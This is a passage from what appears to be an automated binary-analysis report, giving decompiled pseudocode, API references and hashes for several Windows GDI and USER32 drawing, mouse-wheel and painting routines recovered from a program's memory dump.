				struct HDC__* _t191;
				int* _t196;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				int _t216;
				int* _t218;
				void* _t221;
				void* _t223;
				intOrPtr _t224;

				_t198 = __ecx;
				_t221 = _t223;
				_t224 = _t223 + 0xffffffd8;
				_v12 = __ecx;
				_t218 = __edx;
				_v8 = __eax;
				_t196 = _a8;
				if(_v12 != 0) {
					E00420334(_v8);
					 *[fs:eax] = _t224;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x420102, _t221);
					_t204 =  *0x420114; // 0x9
					E004207D8(_v8, __ecx, _t204);
					E00420334(E00424868(_v12));
					_push(_t221);
					_push(0x4200dd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_v20 = _t218[2] -  *_t218;
					_v24 = _t218[3] - _t218[1];
					_t216 = _t196[2] -  *_t196;
					_v16 = _t196[3] - _t196[1];
					if(E00424954(_v12, _t198) != _a4) {
						_v40 = E004242A0(1);
						_t198 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E00424AC8(_v40, _a4, __eflags);
						_t116 = E00424868(_v40);
						_t208 =  *0x420118; // 0x1
						E004207D8(_t116,  *_v40, _t208);
						_v36 =  *((intOrPtr*)(E00424868(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v44 = _t191;
						_push(0);
						L00406AE4();
						_v36 = _t191;
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t221);
					_push(0x4200bb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_t124 = E00424868(_v12);
					_t209 =  *0x420118; // 0x1
					E004207D8(_t124, _t198, _t209);
					if(E0041FD00( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E00424868(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E00420CA0( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E00424868(_v12) + 4), _v24, _v20);
					}
					_pop(_t210);
					 *[fs:eax] = _t210;
					_push(E004200C2);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E004035DC(_v40);
					}
				}
				return __eax;
			}

0x0041fe5c
0x0041fe5d
0x0041fe5f
0x0041fe65
0x0041fe68
0x0041fe6a
0x0041fe6d
0x0041fe74
0x0041fe7d
0x0041fe8d
0x0041fe95
0x0041fe98
0x0041fea1
0x0041feae
0x0041feb5
0x0041feb6
0x0041febb
0x0041febe
0x0041fec6
0x0041fecf
0x0041fed5
0x0041fedd
0x0041feeb
0x0041ff25
0x0041ff2e
0x0041ff30
0x0041ff39
0x0041ff41
0x0041ff46
0x0041ff4c
0x0041ff5c
0x0041ff5f
0x0041ff61
0x0041feed
0x0041feef
0x0041fef7
0x0041fefa
0x0041fefd
0x0041feff
0x0041ff04
0x0041ff14
0x0041ff14
0x0041ff66
0x0041ff67
0x0041ff6c
0x0041ff6f
0x0041ff75
0x0041ff7a
0x0041ff80
0x0041ff92
0x00420007
0x0042001a
0x0042002e
0x0042005c
0x0042006c
0x0042007c
0x0041ff94
0x0041ffca
0x0041ffca
0x00420083
0x00420086
0x00420089
0x00420092
0x0042009e
0x004200a2
0x004200ac
0x004200ac
0x00000000
0x00420094
0x00000000
0x00420097
0x00420092
0x0042010f

APIs

Part of subcall function 00420334: RtlEnterCriticalSection.KERNEL32(00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 0042033C
Part of subcall function 00420334: RtlLeaveCriticalSection.KERNEL32(00492A5C,00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 00420349
Part of subcall function 00420334: RtlEnterCriticalSection.KERNEL32(00000038,00492A5C,00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 00420352

72E7A590.GDI32(00000000), ref: 0041FEFF
SelectObject.GDI32(?,?), ref: 0041FF0F
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 00420007
SetTextColor.GDI32(?,00000000), ref: 00420015
SetBkColor.GDI32(?,00FFFFFF), ref: 00420029
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0042005C
SetTextColor.GDI32(?,?), ref: 0042006C
SetBkColor.GDI32(?,?), ref: 0042007C
SelectObject.GDI32(?,00000000), ref: 004200AC
DeleteDC.GDI32(?), ref: 004200B5

Strings

A, xrefs: 0041FF1B

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$CriticalSection$EnterObjectSelectStretchText$A590DeleteLeave
String ID: A
API String ID: 2975480410-2078354741
Opcode ID: 532be5d483dbf9cb3ec60fc06837030935e4f310f3c9beb7ba52a6b7aab83728
Instruction ID: 48a5c3743e2b23e4cbd1a4c0cefae734c0b5b9385aeea1f21deab3d0ef1a18f4
Opcode Fuzzy Hash: 532be5d483dbf9cb3ec60fc06837030935e4f310f3c9beb7ba52a6b7aab83728
Instruction Fuzzy Hash: 2D91E575A00118AFCB40EFA9D981E9EBBF8EF4D300B5584AAF508E7352C634ED40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00407350, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407350(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}

0x00407357
0x00407359
0x0040735b
0x0040736d
0x0040737c
0x00407388
0x00407394
0x00407399
0x004073b8
0x0040739f
0x004073af
0x004073af
0x004073bd
0x004073da
0x004073c3
0x004073d3
0x004073d3
0x004073e7

APIs

FindWindowA.USER32 ref: 00407368
RegisterClipboardFormatA.USER32 ref: 00407374
RegisterClipboardFormatA.USER32 ref: 00407383
RegisterClipboardFormatA.USER32 ref: 0040738F
SendMessageA.USER32 ref: 004073A7
SendMessageA.USER32 ref: 004073CB

Strings

MSH_SCROLL_LINES_MSG, xrefs: 0040738A
MouseZ, xrefs: 00407363
MSWHEEL_ROLLMSG, xrefs: 0040736F
MSH_WHEELSUPPORT_MSG, xrefs: 0040737E
Magellan MSWHEEL, xrefs: 0040735E

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: 6a6299560d5f7dd8f7aac53574e80a38f3371f82bf0e59142655c396c95621b1
Instruction ID: bfd4119d45ddda525be3bbc129672977e668141d205ce17450295656e3e08ae5
Opcode Fuzzy Hash: 6a6299560d5f7dd8f7aac53574e80a38f3371f82bf0e59142655c396c95621b1
Instruction Fuzzy Hash: C7114F70A48341AFE7019F55DC81B2AB7A8EF45710F204076FD40AB3C1D6B8AC40D7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00427740, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00427740(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x492acb != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x492ab8 = E00427194(7, _t60,  *0x492ab8, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}

0x00427749
0x0042774c
0x00427756
0x00427786
0x0042778c
0x00427848
0x00427850
0x00427850
0x00427794
0x00427799
0x004277a4
0x004277af
0x004277b4
0x0042781d
0x00427835
0x00427846
0x00427831
0x00427831
0x00427831
0x00000000
0x0042781d
0x004277c0
0x004277cf
0x00000000
0x00000000
0x004277e1
0x004277f9
0x0042780f
0x00000000
0x00000000
0x00427815
0x00427817
0x00427817
0x00000000
0x00000000
0x00000000
0x00000000
0x004277f9
0x0042776a
0x0042777f
0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00427779
GetSystemMetrics.USER32 ref: 0042779E
GetSystemMetrics.USER32 ref: 004277A9
GetClipBox.GDI32(?,?), ref: 004277BB
GetDCOrgEx.GDI32(?,?), ref: 004277C8
OffsetRect.USER32(?,?,?), ref: 004277E1
IntersectRect.USER32 ref: 004277F2
IntersectRect.USER32 ref: 00427808

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

EnumDisplayMonitors, xrefs: 00427758

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 5fddcd15ba12338e676d961c3f27d91796c62e49003d0812497e89beca1a2251
Instruction ID: 93d8ab06026ef900d934534446d411bfcde0b04aea28e17855bc4cd7e74bdb2b
Opcode Fuzzy Hash: 5fddcd15ba12338e676d961c3f27d91796c62e49003d0812497e89beca1a2251
Instruction Fuzzy Hash: 9A315E72E04129AFDB11DFA5DC459EFB7BCEB09314F404137F915E2241E6789901CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00424596, Relevance: 16.7, APIs: 11, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00424596(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t74;
				struct HDC__* _t76;
				signed int _t78;
				signed int _t79;
				char _t80;
				void* _t87;
				struct HDC__* _t110;
				void* _t131;
				struct HDC__* _t155;
				intOrPtr* _t159;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;
				intOrPtr _t185;

				_t160 = __ecx;
				_t183 = _t184;
				_t185 = _t184 + 0xffffffe4;
				_t179 = __ecx;
				_v8 = __edx;
				_t159 = __eax;
				_t181 =  *((intOrPtr*)(__eax + 0x28));
				_t167 =  *0x4247e4; // 0xf
				E004207D8(_v8, __ecx, _t167);
				E00424C08(_t159);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *((intOrPtr*)(_t181 + 0x10));
				if(_t74 != 0) {
					_push(0xffffffff);
					_push(_t74);
					_t155 =  *(_v8 + 4);
					_push(_t155);
					L00406C64();
					_v12 = _t155;
					_push( *(_v8 + 4));
					L00406C34();
					_v13 = 1;
				}
				_push(0xc);
				_t76 =  *(_v8 + 4);
				_push(_t76);
				L00406B8C();
				_push(_t76);
				_push(0xe);
				_t78 =  *(_v8 + 4);
				L00406B8C();
				_t168 = _t78;
				_t79 = _t168 * _t78;
				if(_t79 > 8) {
					L5:
					_t80 = 0;
				} else {
					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
						_t80 = 1;
					} else {
						goto L5;
					}
				}
				if(_t80 == 0) {
					if(E00424924(_t159) == 0) {
						SetStretchBltMode(E00420704(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t183);
				_push(0x4247d5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
					E00424BA8(_t159, _t160);
				}
				_t87 = E00424868(_t159);
				_t171 =  *0x4247e4; // 0xf
				E004207D8(_t87, _t160, _t171);
				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00424868(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(E004247DC);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t110 =  *(_v8 + 4);
						_push(_t110);
						L00406C64();
						return _t110;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t183);
					_push(0x42476a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t185;
					L00406AE4();
					_v28 = E00420AFC(0);
					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
					E00420CA0( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00424868(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
					_t131 = 0;
					_t175 = 0;
					 *[fs:eax] = _t175;
					_push(0x4247af);
					if(_v32 != 0) {
						_t131 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t131;
				}
			}

0x00424596
0x00424599
0x0042459b
0x004245a1
0x004245a3
0x004245a6
0x004245a8
0x004245ab
0x004245b4
0x004245bb
0x004245c2
0x004245c5
0x004245c9
0x004245ce
0x004245d0
0x004245d2
0x004245d6
0x004245d9
0x004245da
0x004245df
0x004245e8
0x004245e9
0x004245ee
0x004245ee
0x004245f2
0x004245f7
0x004245fa
0x004245fb
0x00424600
0x00424601
0x00424606
0x0042460a
0x0042460f
0x00424613
0x00424618
0x00424629
0x00424629
0x0042461a
0x0042461e
0x00424627
0x0042462d
0x00000000
0x00000000
0x00000000
0x00424627
0x00424631
0x00424674
0x00424681
0x00424681
0x00424633
0x0042463e
0x0042464c
0x00424664
0x00424664
0x00424688
0x00424689
0x0042468e
0x00424691
0x0042469d
0x004246a1
0x004246a1
0x004246a8
0x004246ad
0x004246b3
0x004246c1
0x004247aa
0x004247b1
0x004247b4
0x004247b7
0x004247c0
0x004247c2
0x004247c7
0x004247cb
0x004247ce
0x004247cf
0x00000000
0x004247cf
0x004247d4
0x004246c7
0x004246c9
0x004246ce
0x004246d3
0x004246d4
0x004246d9
0x004246dc
0x004246e1
0x004246eb
0x004246fb
0x00424735
0x0042473a
0x0042473c
0x0042473f
0x00424742
0x0042474b
0x00424755
0x00424755
0x0042475e
0x00000000
0x00424764
0x00424769
0x00424769

APIs

Part of subcall function 00424C08: 72E7AC50.USER32(00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C5E
Part of subcall function 00424C08: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C73
Part of subcall function 00424C08: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C7D
Part of subcall function 00424C08: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
Part of subcall function 00424C08: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CAC

72E7B410.GDI32(?,?,000000FF), ref: 004245DA
72E7B150.GDI32(?,?,?,000000FF), ref: 004245E9
72E7AD70.GDI32(?,0000000C), ref: 004245FB
72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 0042460A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042463E
SetStretchBltMode.GDI32(?,00000004), ref: 0042464C
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424664
72E7A590.GDI32(00000000,00000000,0042476A,?,?,0000000E,00000000,?,0000000C), ref: 004246E1
SelectObject.GDI32(?,?), ref: 004246F6

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Brush$A590B150B380B410CreateHalftoneModeObjectPaletteSelectStretch
String ID:
API String ID: 1694230195-0
Opcode ID: 822d8c0c5b1fc19b466cdd28b2e5daef08d5921011be1d414dc2d49bcb9e4c9c
Instruction ID: c3d246f68cfade31653b275566af5ea7f18495ef8c9c9298942679e887091d32
Opcode Fuzzy Hash: 822d8c0c5b1fc19b466cdd28b2e5daef08d5921011be1d414dc2d49bcb9e4c9c
Instruction Fuzzy Hash: FA516BB5B00215AFCB40EFA9D985E5EBBF8EB89304F51846AB509E7281D738ED00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0043A424, Relevance: 16.6, APIs: 11, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043A424(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0043907C(_t83) != 0) {
						_t38 = E00439F44(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L00406EA4();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L00406ADC();
					_v12 = _t47;
					L00407114();
					L00406AE4();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E0043C1F4(_t83),  &_v80);
					E00436D28(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E0043A424(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43a576, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00406ABC();
					EndPaint(E0043C1F4(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x43a57d);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

0x0043a425
0x0043a427
0x0043a42c
0x0043a42d
0x0043a42f
0x0043a438
0x0043a444
0x0043a463
0x0043a451
0x0043a457
0x0043a457
0x0043a583
0x0043a46d
0x0043a46f
0x0043a47d
0x0043a48b
0x0043a48e
0x0043a493
0x0043a498
0x0043a49e
0x0043a4a5
0x0043a4aa
0x0043a4ba
0x0043a4c8
0x0043a4d7
0x0043a4ec
0x0043a4f4
0x0043a4fb
0x0043a502
0x0043a519
0x0043a527
0x0043a52d
0x0043a52e
0x0043a530
0x0043a533
0x0043a544
0x0043a54b
0x0043a54e
0x0043a551
0x0043a55e
0x0043a567
0x0043a575
0x0043a575

APIs

72E7AC50.USER32(00000000), ref: 0043A46F
72E7A520.GDI32(00000000,?), ref: 0043A493
72E7B380.USER32(00000000,00000000,00000000,?), ref: 0043A49E
72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 0043A4A5
SelectObject.GDI32(?,?), ref: 0043A4B5
BeginPaint.USER32(00000000,?,00000000,0043A576,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0043A4D7
72E897E0.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0043A533
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0043A544
SelectObject.GDI32(?,?), ref: 0043A55E
DeleteDC.GDI32(?), ref: 0043A567
DeleteObject.GDI32(?), ref: 0043A570

Part of subcall function 00439F44: BeginPaint.USER32(00000000,?), ref: 00439F6A
Part of subcall function 00439F44: EndPaint.USER32(00000000,?,0043A06B), ref: 0043A05E

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
String ID:
API String ID: 3782911080-0
Opcode ID: c6ce3e876bf295ee34a86f7ca7c7dd2d1aedf9be2a822b285e77e78c75a6eae6
Instruction ID: 86ebff45ab5d5e5e7902dd9a049ce1f4de68836528b4e3a0ffe90387a61ef89e
Opcode Fuzzy Hash: c6ce3e876bf295ee34a86f7ca7c7dd2d1aedf9be2a822b285e77e78c75a6eae6
Instruction Fuzzy Hash: 5A414D71B00204ABDB00EBA9CC85B9EB7F8AF48704F10447AB50AEB282DA799D158B55

Uniqueness

Uniqueness Score: -1.00%

Function 00442D24, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00442D24(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E004428C8(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E004242A0(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E004256B8(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E0041FBEC( *((intOrPtr*)(E00424868( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00412B80( *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E00424868( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E00420284(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420704(E00424868( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00442A04(_t118));
						L00426A64();
						E00412B80(_a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00420704(E00424868( *((intOrPtr*)(_t118 + 0x54))));
						E0041FBEC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000014, _t135, _t139, __eflags);
						_t136 = E00420704(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00406ABC();
						E0041FBEC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000010, _t135, _t139, _t85);
						_t137 = E00420704(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00406ABC();
						return _t96;
					}
					_push(_a8);
					_push(E004426C4(_t142));
					E00442CFC(_t118, _t142);
					_push(E004426C4(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00420704(__ecx));
					_push(_v8);
					_t117 = E00442A04(_t118);
					_push(_t117);
					L00426A64();
					return _t117;
				}
				return _t46;
			}

0x00442d24
0x00442d2d
0x00442d2f
0x00442d32
0x00442d36
0x00442d3d
0x00442d43
